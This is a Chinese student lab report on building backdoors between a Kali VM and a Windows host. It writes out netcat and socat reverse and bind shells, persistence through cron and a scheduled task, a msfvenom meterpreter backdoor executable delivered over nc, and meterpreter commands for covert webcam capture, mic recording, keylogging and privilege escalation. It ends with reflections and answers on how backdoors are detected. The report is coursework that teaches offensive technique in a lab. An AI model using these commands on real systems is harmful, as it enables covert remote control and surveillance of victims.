Exp2 后门原理与实践

任务一：使用netcat获取主机操作Shell，cron启动

1.windows获取linux shell

1.1 ipconfig 查看本机查看以太网适配器（8）的ipv4地址

1.2windows： ncat.exe -l -p 调用ncat.exe程序来蹲守本机的4325端口

1.3 nc –e /bin/sh 在Kali环境下，使用nc指令的-e参数反向连接Windows主机的4325端口：

2.linux获得windows shell

2.1 Kali : ifconfig 命令查看IP

2.2 kali: nc –l –p 使用nc指令蹲守4325端口。

2.3 Windows: ncat.exe –e cmd.exe 调用ncat.exe程序并用-e参数反向连接Kali主机的4325端口。

3. 使用nc传输数据

3.1 ncat.exe –l Windows下蹲守4325端口

3.2 nc 建立连接

3.3 之后就可以传输数据了，在kali上打字，windows主机屏幕上也会显示你打的内容。

4. 使用netcat获取主机操作Shell，cron启动

4.1 windows： ncat.exe -l -p 监听本地4325端口

4.2crontab -e编辑一条定时任务，选择编辑器时选择基本的vim编辑器就行(3号)。

点i进行编辑，在最后一行编辑 * * * * /bin/netcat -e /bin/sh （：wq 保存退出）,这里我选择的是每小时的第三分钟。

4.3 等到了10：03分的时候就可以在windows中查看了。

任务二：使用socat获取主机操作Shell, 任务计划启动

2.1在Windows系统下，打开：控制面板->系统和安全->管理工具->任务计划程序，在操作选项（菜单栏）中，选择“创建任务”。

名称：20164325

新建触发器，选择开始任务时间为：工作站锁定时。

新建操作，选择启动的程序为 socat.exe ，参数项填为 tcp-listen: exec:cmd.exe,pty,stderr ，含义为：把cmd.exe绑定到端口号，同时把cmd.exe的stderr重定向到stdout上

运行任务

2.2在kali终端输入指令 socat - tcp:

注意：之前的任务我都是用的以太网适配器vmware network adapter vmnet1 在之前的任务中都可以成功，就是这个任务会出现问题，问了同学才知道，要用以太网适配器vmware network adapter vmnet8的ipv4，解决的问题。

任务三：使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

3.1Kali: msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > 20164325_backdoor.exe ，注意这里的IP地址为控制端IP，即在kali上查的IP，可见已经生成了后门程序“ 20164325_backdoor.exe ”

3.2Windows： ncat.exe -lv > 20164325_backdoor.exe ，这样被控主机就进入了接收文件模式，开始传输中的时候是只有前两行，下面是连接上了，文件传输成功的截图

3.3在kali中执行 nc < 20164325_backdoor.exe ，注意这里的IP为被控主机IP，即WindowsIP （ps：这里我出现了问题，所以我就把三个可用的ipv4地址都试了一下，结果是无线局域网的可以使用）

在Kali上使用 msfconsole 指令进入msf控制台

use exploit/multi/handler 使用监听模块，设置payload
set payload windows/meterpreter/reverse_tcp ，使用和生成后门程序时相同的payload
set LHOST 192.168.113.133 ，这里用的是kali IP，和生成后门程序时指定的IP相同
，同样要使用相同的端口

3.5设置完成后，执行监听

（我是双击的后门文件，来开启的）以下是监听结果，开启后门文件之前就只有前一行。

任务四：使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

4.1目标主机音频

使用 record_mic 指令可以截获一段音频，可以用 -d 选项设置录制时间

4.2摄像头

webcam_snap 指令可以使用摄像头进行偷拍

webcam stream 指令可以使用摄像头进行录像

4.3击键记录

keyscan_start 指令开始记录下击键的过程

keyscan_dump 指令读取击键的记录

(第一行我实在命令行中输入的指令，随便输入的；第二行就是在word里面输入的，后面的一些东西是我按的空格)

4.4提权

getuid 指令查看当前用户

getsystem 指令进行提权

4.5截屏

screenshot 指令可以进行截屏,效果如下：

五.实验总结与体会

这次实验我吸取了上次实验的教训，对虚拟机的操作更加的顺利，但是我在ip地址的部分出了很多问题，第一次实在任务三的时候；会出现攻击者的ip和被攻击者的ip混的情况，这也是没有清楚原理的表现，这种情况就是刚开始做的时候会出现，但是之后就不会出现这种问题了；还有一个问题，就是要随时检查windows的ip和kali的ip，避免实验出现问题。做任务四的时候真的感受到了恐怖，之后一定会对自己的电脑做好防护。

六.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

答：这个实验中的后门就是运行一个程序，双击就能开启后门，让人监听；所以我觉得它可能无处不在，会在软件里双击打开，或者安装时就会出现；我觉得还会在网页中打开吧，比如说有一个链接，就会连着后门文件；应该也会潜在下载的文件啊啥的，能打开的东西上。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

答：伪装吧，让计算机中的防火墙和杀毒软件不会直把它灭掉，以为是什么其他的安全软件；我觉得还可能是更改被攻击主机的什么设置，让主机找不到这个后门。

像实验中所说的：Linux可以使用cron启动，Windows下通过任务计划来启动后门程序。

(3)Meterpreter有哪些给你映像深刻的功能？

答：获取摄像头权限进行拍照和视频，录音，提升用户权限等等都很恐怖深刻。

(4)如何发现自己有系统有没有被安装后门？

答：杀毒软件等等的那种防护检查漏洞的软件，来检查是否安装后门。